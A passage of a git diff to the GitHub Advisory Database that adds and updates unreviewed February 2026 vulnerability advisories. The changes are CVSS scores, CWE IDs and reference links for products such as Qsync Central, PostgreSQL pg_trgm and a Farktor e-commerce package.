.../GHSA-5cc2-fh28-2crw.json | 6 ++- .../GHSA-5pr9-9395-q5gq.json | 36 +++++++++++++++ .../GHSA-673q-8hc3-p8qm.json | 6 ++- .../GHSA-6j8r-j98h-9g9f.json | 6 ++- .../GHSA-6mvg-6pj4-7q9q.json | 6 ++- .../GHSA-793m-9x46-97m4.json | 36 +++++++++++++++ .../GHSA-87q4-v2f4-jh82.json | 9 +++- .../GHSA-93qw-26xw-p89x.json | 6 ++- .../GHSA-95c6-28c3-2pjc.json | 11 +++-- .../GHSA-993x-2cg3-pv23.json | 6 ++- .../GHSA-9jhc-rr6j-x87m.json | 15 +++++-- .../GHSA-9q6f-339m-42fv.json | 6 ++- .../GHSA-9wvg-f2jp-vhcf.json | 6 ++- .../GHSA-cmjp-m265-83j5.json | 36 +++++++++++++++ .../GHSA-f3vj-j2m6-8hfj.json | 36 +++++++++++++++ .../GHSA-fwjr-9qgx-rpmm.json | 36 +++++++++++++++ .../GHSA-fxh5-4p4v-76pm.json | 6 ++- .../GHSA-g4hh-hm34-58p5.json | 6 ++- .../GHSA-g4xh-r45m-435w.json | 6 ++- .../GHSA-gxc8-m8f8-7c2c.json | 40 +++++++++++++++++ .../GHSA-hgmp-6hmc-prfc.json | 36 +++++++++++++++ .../GHSA-j5x8-2r52-c3ff.json | 15 +++++-- .../GHSA-jh5g-w5hx-478p.json | 15 +++++-- .../GHSA-jwg7-4hhr-69vp.json | 9 +++- .../GHSA-m447-7fh7-88xc.json | 15 +++++-- .../GHSA-m5h7-v442-fv53.json | 6 ++- .../GHSA-mq5v-x68w-mc4f.json | 36 +++++++++++++++ .../GHSA-qw3h-8vxv-jf6c.json | 36 +++++++++++++++ .../GHSA-qwvg-xq53-3vw2.json | 15 +++++-- .../GHSA-rfv8-2g5x-rm48.json | 6 ++- .../GHSA-rghx-3352-87pf.json | 6 ++- .../GHSA-v66c-4xgf-59c7.json | 15 +++++-- .../GHSA-v99r-49f4-6c26.json | 6 ++- .../GHSA-w65x-hpv6-vv6v.json | 15 +++++-- .../GHSA-w669-772h-5fh5.json | 6 ++- .../GHSA-wj6w-x5qq-4qqw.json | 11 +++-- .../GHSA-wvx5-w592-wf52.json | 40 +++++++++++++++++ .../GHSA-x5rj-w9pr-xhrg.json | 40 +++++++++++++++++ .../GHSA-x64q-5pj8-ccxv.json | 44 +++++++++++++++++++ .../GHSA-xp29-43pm-7r9g.json | 11 +++-- 48 files changed, 757 insertions(+), 67 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-2xqp-gcm9-67f8/GHSA-2xqp-gcm9-67f8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3c56-h59m-r49v/GHSA-3c56-h59m-r49v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5pr9-9395-q5gq/GHSA-5pr9-9395-q5gq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-793m-9x46-97m4/GHSA-793m-9x46-97m4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cmjp-m265-83j5/GHSA-cmjp-m265-83j5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f3vj-j2m6-8hfj/GHSA-f3vj-j2m6-8hfj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fwjr-9qgx-rpmm/GHSA-fwjr-9qgx-rpmm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gxc8-m8f8-7c2c/GHSA-gxc8-m8f8-7c2c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hgmp-6hmc-prfc/GHSA-hgmp-6hmc-prfc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mq5v-x68w-mc4f/GHSA-mq5v-x68w-mc4f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qw3h-8vxv-jf6c/GHSA-qw3h-8vxv-jf6c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wvx5-w592-wf52/GHSA-wvx5-w592-wf52.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x5rj-w9pr-xhrg/GHSA-x5rj-w9pr-xhrg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x64q-5pj8-ccxv/GHSA-x64q-5pj8-ccxv.json diff --git a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json index e9e4d6c1a5c7e..c399c22289ffd 100644 --- a/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json +++ b/advisories/unreviewed/2026/01/GHSA-8x3f-4jvw-ww73/GHSA-8x3f-4jvw-ww73.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8x3f-4jvw-ww73", - "modified": "2026-02-11T15:30:21Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-01-08T15:31:25Z", "aliases": [ "CVE-2026-0719" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2026-0719" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2628" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2529" diff --git a/advisories/unreviewed/2026/02/GHSA-23f5-mvxj-rqhr/GHSA-23f5-mvxj-rqhr.json b/advisories/unreviewed/2026/02/GHSA-23f5-mvxj-rqhr/GHSA-23f5-mvxj-rqhr.json index ba97f24215696..41c51093e0a5c 100644 --- a/advisories/unreviewed/2026/02/GHSA-23f5-mvxj-rqhr/GHSA-23f5-mvxj-rqhr.json +++ b/advisories/unreviewed/2026/02/GHSA-23f5-mvxj-rqhr/GHSA-23f5-mvxj-rqhr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-23f5-mvxj-rqhr", - "modified": "2026-02-11T18:31:29Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T18:31:29Z", "aliases": [ "CVE-2025-65127" ], "details": "A lack of session validation in the web API component of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote unauthenticated attackers to access administrative information-retrieval functions intended for authenticated users. By invoking \"get_*\" operations, attackers can obtain device configuration data, including plaintext credentials, without authentication or an existing session.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T17:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2xqp-gcm9-67f8/GHSA-2xqp-gcm9-67f8.json b/advisories/unreviewed/2026/02/GHSA-2xqp-gcm9-67f8/GHSA-2xqp-gcm9-67f8.json new file mode 100644 index 0000000000000..fb2a7f6694fad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2xqp-gcm9-67f8/GHSA-2xqp-gcm9-67f8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2xqp-gcm9-67f8", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2025-13004" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in Farktor Software E-Commerce Services Inc. E-Commerce Package allows Manipulating User-Controlled Variables.This issue affects E-Commerce Package: through 27112025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13004" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0063" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-39q6-v89p-42vg/GHSA-39q6-v89p-42vg.json b/advisories/unreviewed/2026/02/GHSA-39q6-v89p-42vg/GHSA-39q6-v89p-42vg.json index b5c86dbfa90f8..5ec03ab519389 100644 --- a/advisories/unreviewed/2026/02/GHSA-39q6-v89p-42vg/GHSA-39q6-v89p-42vg.json +++ b/advisories/unreviewed/2026/02/GHSA-39q6-v89p-42vg/GHSA-39q6-v89p-42vg.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-39q6-v89p-42vg", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54149" ], "details": "An uncontrolled resource consumption vulnerability has been reported to affect Qsync Central. If a local attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-3c56-h59m-r49v/GHSA-3c56-h59m-r49v.json b/advisories/unreviewed/2026/02/GHSA-3c56-h59m-r49v/GHSA-3c56-h59m-r49v.json new file mode 100644 index 0000000000000..da46ccb9b6838 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3c56-h59m-r49v/GHSA-3c56-h59m-r49v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c56-h59m-r49v", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2023-31313" + ], + "details": "An unintended proxy or intermediary in the AMD power management firmware (PMFW) could allow a privileged attacker to send malformed messages to the system management unit (SMU) potentially resulting in arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31313" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-441" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T15:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-45q5-pv8q-m46g/GHSA-45q5-pv8q-m46g.json b/advisories/unreviewed/2026/02/GHSA-45q5-pv8q-m46g/GHSA-45q5-pv8q-m46g.json index 7a8a2717ef010..68366c5afc775 100644 --- a/advisories/unreviewed/2026/02/GHSA-45q5-pv8q-m46g/GHSA-45q5-pv8q-m46g.json +++ b/advisories/unreviewed/2026/02/GHSA-45q5-pv8q-m46g/GHSA-45q5-pv8q-m46g.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-45q5-pv8q-m46g", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-52869" ], "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-4chc-49pc-wcqq/GHSA-4chc-49pc-wcqq.json b/advisories/unreviewed/2026/02/GHSA-4chc-49pc-wcqq/GHSA-4chc-49pc-wcqq.json index 903e8d876818e..aaf37dd00eda5 100644 --- a/advisories/unreviewed/2026/02/GHSA-4chc-49pc-wcqq/GHSA-4chc-49pc-wcqq.json +++ b/advisories/unreviewed/2026/02/GHSA-4chc-49pc-wcqq/GHSA-4chc-49pc-wcqq.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4chc-49pc-wcqq", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-52870" ], "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-4r22-3675-4h3p/GHSA-4r22-3675-4h3p.json b/advisories/unreviewed/2026/02/GHSA-4r22-3675-4h3p/GHSA-4r22-3675-4h3p.json index c2192d307103b..936706b8038a5 100644 --- a/advisories/unreviewed/2026/02/GHSA-4r22-3675-4h3p/GHSA-4r22-3675-4h3p.json +++ b/advisories/unreviewed/2026/02/GHSA-4r22-3675-4h3p/GHSA-4r22-3675-4h3p.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4r22-3675-4h3p", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-57710" ], "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-5cc2-fh28-2crw/GHSA-5cc2-fh28-2crw.json b/advisories/unreviewed/2026/02/GHSA-5cc2-fh28-2crw/GHSA-5cc2-fh28-2crw.json index 24b50b0c9691c..838ce1f2936c8 100644 --- a/advisories/unreviewed/2026/02/GHSA-5cc2-fh28-2crw/GHSA-5cc2-fh28-2crw.json +++ b/advisories/unreviewed/2026/02/GHSA-5cc2-fh28-2crw/GHSA-5cc2-fh28-2crw.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5cc2-fh28-2crw", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-58471" ], "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.2.0.1 ( 2025/12/21 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-5pr9-9395-q5gq/GHSA-5pr9-9395-q5gq.json b/advisories/unreviewed/2026/02/GHSA-5pr9-9395-q5gq/GHSA-5pr9-9395-q5gq.json new file mode 100644 index 0000000000000..dfe7e973aeb58 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5pr9-9395-q5gq/GHSA-5pr9-9395-q5gq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pr9-9395-q5gq", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-2007" + ], + "details": "Heap buffer overflow in PostgreSQL pg_trgm allows a database user to achieve unknown impacts via a crafted input string. The attacker has limited control over the byte patterns to be written, but we have not ruled out the viability of attacks that lead to privilege escalation. PostgreSQL 18.1 and 18.0 are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2007" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/support/security/CVE-2026-2007" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-673q-8hc3-p8qm/GHSA-673q-8hc3-p8qm.json b/advisories/unreviewed/2026/02/GHSA-673q-8hc3-p8qm/GHSA-673q-8hc3-p8qm.json index 81aa6239b046f..4d8e54819ddf8 100644 --- a/advisories/unreviewed/2026/02/GHSA-673q-8hc3-p8qm/GHSA-673q-8hc3-p8qm.json +++ b/advisories/unreviewed/2026/02/GHSA-673q-8hc3-p8qm/GHSA-673q-8hc3-p8qm.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-673q-8hc3-p8qm", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54148" ], "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json index 63b32854e8046..eb8792c82e4f2 100644 --- a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json +++ b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6j8r-j98h-9g9f", - "modified": "2026-02-11T15:30:21Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-02T15:30:34Z", "aliases": [ "CVE-2026-1761" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2026-1761" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2628" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2529" diff --git a/advisories/unreviewed/2026/02/GHSA-6mvg-6pj4-7q9q/GHSA-6mvg-6pj4-7q9q.json b/advisories/unreviewed/2026/02/GHSA-6mvg-6pj4-7q9q/GHSA-6mvg-6pj4-7q9q.json index a34b244a9004c..487e8da066e10 100644 --- a/advisories/unreviewed/2026/02/GHSA-6mvg-6pj4-7q9q/GHSA-6mvg-6pj4-7q9q.json +++ b/advisories/unreviewed/2026/02/GHSA-6mvg-6pj4-7q9q/GHSA-6mvg-6pj4-7q9q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6mvg-6pj4-7q9q", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T15:32:43Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-58467" ], "details": "A relative path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-793m-9x46-97m4/GHSA-793m-9x46-97m4.json b/advisories/unreviewed/2026/02/GHSA-793m-9x46-97m4/GHSA-793m-9x46-97m4.json new file mode 100644 index 0000000000000..148c82b2d4ebb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-793m-9x46-97m4/GHSA-793m-9x46-97m4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-793m-9x46-97m4", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2025-10969" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Farktor Software E-Commerce Services Inc. E-Commerce Package allows Blind SQL Injection.This issue affects E-Commerce Package: through 27112025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10969" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0063" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87q4-v2f4-jh82/GHSA-87q4-v2f4-jh82.json b/advisories/unreviewed/2026/02/GHSA-87q4-v2f4-jh82/GHSA-87q4-v2f4-jh82.json index 934388965e87c..b3e4266f99c16 100644 --- a/advisories/unreviewed/2026/02/GHSA-87q4-v2f4-jh82/GHSA-87q4-v2f4-jh82.json +++ b/advisories/unreviewed/2026/02/GHSA-87q4-v2f4-jh82/GHSA-87q4-v2f4-jh82.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-87q4-v2f4-jh82", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54151" ], "details": "An uncontrolled resource consumption vulnerability has been reported to affect Qsync Central. If a local attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-93qw-26xw-p89x/GHSA-93qw-26xw-p89x.json b/advisories/unreviewed/2026/02/GHSA-93qw-26xw-p89x/GHSA-93qw-26xw-p89x.json index b959a2c005ee4..8ba7c6fb55c19 100644 --- a/advisories/unreviewed/2026/02/GHSA-93qw-26xw-p89x/GHSA-93qw-26xw-p89x.json +++ b/advisories/unreviewed/2026/02/GHSA-93qw-26xw-p89x/GHSA-93qw-26xw-p89x.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-93qw-26xw-p89x", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-54146" ], "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-95c6-28c3-2pjc/GHSA-95c6-28c3-2pjc.json b/advisories/unreviewed/2026/02/GHSA-95c6-28c3-2pjc/GHSA-95c6-28c3-2pjc.json index 322051d75fe14..1909c1ceb3ac2 100644 --- a/advisories/unreviewed/2026/02/GHSA-95c6-28c3-2pjc/GHSA-95c6-28c3-2pjc.json +++ b/advisories/unreviewed/2026/02/GHSA-95c6-28c3-2pjc/GHSA-95c6-28c3-2pjc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-95c6-28c3-2pjc", - "modified": "2026-02-03T15:30:27Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-03T15:30:27Z", "aliases": [ "CVE-2026-25036" ], "details": "Missing Authorization vulnerability in WP Chill Passster content-protector allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Passster: from n/a through <= 4.2.25.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-03T15:16:21Z" diff --git a/advisories/unreviewed/2026/02/GHSA-993x-2cg3-pv23/GHSA-993x-2cg3-pv23.json b/advisories/unreviewed/2026/02/GHSA-993x-2cg3-pv23/GHSA-993x-2cg3-pv23.json index 984203893e59d..3d69cd31fc9b5 100644 --- a/advisories/unreviewed/2026/02/GHSA-993x-2cg3-pv23/GHSA-993x-2cg3-pv23.json +++ b/advisories/unreviewed/2026/02/GHSA-993x-2cg3-pv23/GHSA-993x-2cg3-pv23.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-993x-2cg3-pv23", - "modified": "2026-02-10T18:30:40Z", + "modified": "2026-02-12T15:32:42Z", "published": "2026-02-10T18:30:40Z", "aliases": [ "CVE-2026-1997" ], "details": "Certain HP OfficeJet Pro printers may expose information if Cross‑Origin Resource Sharing (CORS) is misconfigured, potentially allowing unauthorized web origins to access device resource.\n\nCORS is disabled by default on 